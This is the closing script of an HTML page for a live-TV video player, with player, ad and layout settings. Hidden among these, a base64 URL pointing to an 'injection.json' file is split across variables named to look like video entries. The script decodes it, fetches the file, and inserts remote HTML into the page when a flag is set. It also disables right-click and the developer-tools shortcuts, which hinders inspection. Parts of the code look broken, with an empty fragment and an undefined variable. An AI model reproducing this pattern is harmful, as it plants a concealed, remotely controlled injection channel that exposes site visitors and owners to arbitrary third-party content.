     sharing: !1
    },
    firstVideo = "";
   setInterval(() => {
    $("#loader-image").attr("src", x.loaderimg), $(".logoText").html(x.name)
   }, 10), $(document).contextmenu(function(e) {
    return e.preventDefault(), !1
   }), document.onkeydown = function(e) {
    return 123 != event.keyCode && ((!e.ctrlKey || !e.shiftKey || e.keyCode != "I".charCodeAt(0)) && ((!e.ctrlKey || !e.shiftKey || e.keyCode != "C".charCodeAt(0)) && ((!e.ctrlKey || !e.shiftKey || e.keyCode != "J".charCodeAt(0)) && ((!e.ctrlKey || e.keyCode != "U".charCodeAt(0)) && void 0))))
   }, setTimeout(() => {
    $("#loader").css("display", "none"), $("body").css("overflow", "auto")
   }, 100);
   var src, secondVideo = "mNvbnRlbnQuY29tL3NvZnR";
   $("span").each(function(e) {
    $(this).on("click", function() {
     var e = $(this).attr("url");
     rmp.setControls(!0), src = "mp4" == appSettings.videoFormat ? {
      hls: e
     } : {
      mp4: [e]
     }, rmp.setSrc(src), rmp.play()
    })
   });
   var thirdVideo = "3ZWJ0dXRzL015RHJpdmUvbW";
   src = "mp4" == appSettings.videoFormat ? {
    hls: appSettings.introHls
   } : {
    mp4: [appSettings.introMp4]
   };
   var fourthVideo = "Fpbi9pbmplY3Rpb24uanNvbg==",
    settings = {
     licenseKey: x.licenseKey,
     autoHeightMode: x.autoHeightMode,
     pip: x.pip,
     delayToFade: 3e3,
     gaLabel: "Live TV",
     logoWatermark: !0,
     logoPosition: "topleft",
     speed: "Speed",
     isLive: !0,
     googleCast: !0,
     airplay: !0,
     hlsJSMaxBufferLength: 24,
     hlsJSLiveSyncDuration: 18,
     hlsJSStartLevel: -1,
     hlsJSMinAutoBitrate: 1e5,
     hlsJSAbrBandWidthFactor: .9,
     hlsJSAbrBandWidthUpFactor: .7,
     hlsJSLiveBackBufferLength: 0,
     detectAutoplayCapabilities: !0,
     autoplay: x.autoplay,
     mutedAutoplayOnMobile: !1,
     mutedAutoplayOnMacosSafari11Plus: !1,
     srcChangeAutoplay: !0,
     playsInline: !0,
     skin: x.skin,
     skinBackgroundColor: "rgba(0, 0, 0, 0.7)",
     skinButtonColor: "FFFFFF",
     skinAccentColor: "FF0000",
     ads: !0,
     nav: !0,
     adBlockerDetection: !0,
     adEnablePreloading: !0,
     adBlockerDetectedMessage: "Ad-blocker software detected. Please disable Ad-blocker to watch stream.",
     quickRewind: 10,
     quickForward: 10,
     adAutoAlign: !1,
     hideControls: x.hideControls,
     preload: x.preload,
     crossorigin: !0,
     sharing: x.sharing,
     sharingUrl: x.website,
     contentMetadata: {
      artwork: [{
       src: x.poster,
       sizes: "1280x720",
       type: "image/jpg"
      }],
      poster: [x.poster],
      endOfVideoPoster: [x.poster],
      thumbnail: x.poster
     },
     src: src
    },
    elementID = "rmpPlayer",
    rmp = new RadiantMP(elementID),
    rmpContainer = document.getElementById(elementID);
   rmp.setLoop(!0), rmp.init(settings), $(function() {
    $(window).scroll(function e() {
     return $("#rmpPlayer").css($(window).scrollTop() > 1 ? {
      position: "fixed",
      top: "0px"
     } : {
      position: "relative",
      top: "auto"
     }), $("#buttons-list").css($(window).scrollTop() > 1 ? {
      "margin-top": $("#rmpPlayer").height()
     } : {
      "margin-top": "0px"
     }), e
    }())
   });
   const request = async e => {
    const t = await fetch(e);
    return await t.json()
   };
   navigator.onLine && request(atob(firstVideo + secondVideo + thirdVideo + fourthVideo)).then(t => {
    1 == t.inject && document.querySelector("div").insertAdjacentHTML("afterend", e.content)
   }).catch(e => {
    console.log(appSettings.name)
   });
  </script>
 </body>
</html>